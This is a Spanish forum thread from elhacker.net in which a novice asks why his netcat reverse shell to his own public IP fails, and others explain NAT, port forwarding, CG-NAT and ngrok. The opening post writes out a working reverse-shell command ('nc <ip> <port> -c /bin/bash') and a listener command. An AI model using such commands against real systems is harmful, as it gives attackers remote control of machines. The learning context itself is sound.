elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Reverse shell a ip publica
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Reverse shell a ip publica  (Leído 2,982 veces)
Panic0

Desconectado Desconectado

Mensajes: 218



Ver Perfil
Reverse shell a ip publica
« en: 23 Febrero 2022, 03:05 am »

Hola, como estan? Espero que muy bien :)

Estaba tratando de hacer una "reverse shell" a un equipo de mi red privada, pero sin usar la ip privada. Sino que la ip publica.

Cuestion, hago lo siguiente:

Mi equipo
Código:
┌──(panic0㉿192)-[~]
└─$ nc -nlvp 433


A la maquina victima (La reverse shell)
Código:
┌──(leoj㉿666)-[~]
└─$  nc <ip publica> <puerto> -c /bin/bash

Pero, al momento de hacer esto pasa lo siguiente
Queda el comando ejecutado en la terminal

Y despues, se sale.

Quedando la terminal asi (Normal, como si no ejecutase ningun comando)
Código:
┌──(panic0㉿192)-[~]
└─$         






Saben por que pasa esto? O estoy haciendo algo mal?

Cabe aclarar que soy muy nuevo en esto :)

Gracias!!


En línea

Los ataques de pánico suelen comenzar de forma súbita, sin advertencia.
.xAk.


Desconectado Desconectado

Mensajes: 397


F0r3v3R NeWbI3


Ver Perfil WWW
Re: Reverse shell a ip publica
« Respuesta #1 en: 23 Febrero 2022, 09:20 am »

Para utilizar la ip pública tienes que salir de tu red. Tienes que utilizar un proxy, vpn, un simple dispositivo, pero fuera de tu red o no puedes llegar.
En línea


#!drvy


Desconectado Desconectado

Mensajes: 5.850



Ver Perfil WWW
Re: Reverse shell a ip publica
« Respuesta #2 en: 23 Febrero 2022, 10:22 am »

Tu IP pública no apunta directamente a tu máquina. Aquí se pueden dar mayoritariamente 2 casos:

1. Tu IP pública apunta directamente a tu router/modem. En este caso, el router es el que decide después como direccionar los paquetes hacia el resto de máquinas que se conectan a el. Si es el caso, cuando haces una solicitud directa a esa IP, es el router el que recibe la conexión y como no hay intercambio ni traza que seguir, los paquetes los descarta.  En este caso puedes hacer un Virtual Zone apuntando X puerto directo hacia la IP privada de tu máquina, o abrir una DMZ (Zona desmilitarizada) que apunta todo el tráfico (todos los puertos y protocolos) a una máquina de la red privada. A esto se le conoce de toda la vida como abrir puertos.



2. Tu IP pública es compartida entre varios. Esto se conoce como CG-NAT y es una forma de ahorrar direcciones IP por parte del ISP. Esto quiere decir que cuando solicitas algo a "tu" IP pública, en realidad te está respondiendo un router/switch de tu ISP. Ese router/switch de tu ISP es el que se encarga de direccionar el tráfico según deba. Es como tu router de casa, pero sin que tengas control ninguno sobre el. En este caso no puedes abrir puertos ni puedes hacer una DMZ. La única opción que te queda es usar redes VPC/VPN externas que hagan de intermediario entre tu máquina y sus IP públicas.


Algo para cosas básicas que te sirve para ambos casos es ngrok. Ahí te dan un host externo y hacen de intermediario entre tu maquina y ese host.

https://ngrok.com/


Saludos
« Última modificación: 23 Febrero 2022, 10:25 am por #!drvy » En línea

Panic0

Desconectado Desconectado

Mensajes: 218



Ver Perfil
Re: Reverse shell a ip publica
« Respuesta #3 en: 23 Febrero 2022, 13:55 pm »

Tu IP pública no apunta directamente a tu máquina. Aquí se pueden dar mayoritariamente 2 casos:

1. Tu IP pública apunta directamente a tu router/modem. En este caso, el router es el que decide después como direccionar los paquetes hacia el resto de máquinas que se conectan a el. Si es el caso, cuando haces una solicitud directa a esa IP, es el router el que recibe la conexión y como no hay intercambio ni traza que seguir, los paquetes los descarta.  En este caso puedes hacer un Virtual Zone apuntando X puerto directo hacia la IP privada de tu máquina, o abrir una DMZ (Zona desmilitarizada) que apunta todo el tráfico (todos los puertos y protocolos) a una máquina de la red privada. A esto se le conoce de toda la vida como abrir puertos.



2. Tu IP pública es compartida entre varios. Esto se conoce como CG-NAT y es una forma de ahorrar direcciones IP por parte del ISP. Esto quiere decir que cuando solicitas algo a "tu" IP pública, en realidad te está respondiendo un router/switch de tu ISP. Ese router/switch de tu ISP es el que se encarga de direccionar el tráfico según deba. Es como tu router de casa, pero sin que tengas control ninguno sobre el. En este caso no puedes abrir puertos ni puedes hacer una DMZ. La única opción que te queda es usar redes VPC/VPN externas que hagan de intermediario entre tu máquina y sus IP públicas.


Algo para cosas básicas que te sirve para ambos casos es ngrok. Ahí te dan un host externo y hacen de intermediario entre tu maquina y ese host.

https://ngrok.com/


Saludos


Gracias!!

Creo que me tiró más por el primer caso
En línea

Los ataques de pánico suelen comenzar de forma súbita, sin advertencia.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Reverse Shell
Programación Visual Basic
cobein 9 5,086 Último mensaje 15 Septiembre 2010, 18:45 pm
por VanHan
[!] Reverse shell Unix-like
Bugs y Exploits
xv0 6 5,739 Último mensaje 15 Enero 2013, 16:36 pm
por Falso Positivo
Reverse Shell, sin IP Publica ni DMZ? (Solucionado)
Dudas Generales
AlbertoBSD 7 5,380 Último mensaje 27 Febrero 2016, 01:14 am
por AlbertoBSD
python reverse shell
Scripting
Sentex 6 2,936 Último mensaje 27 Septiembre 2017, 17:31 pm
por Sentex
http, tcp reverse shell
Hacking
juliomob 5 4,321 Último mensaje 6 Noviembre 2020, 14:27 pm
por BloodSharp
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines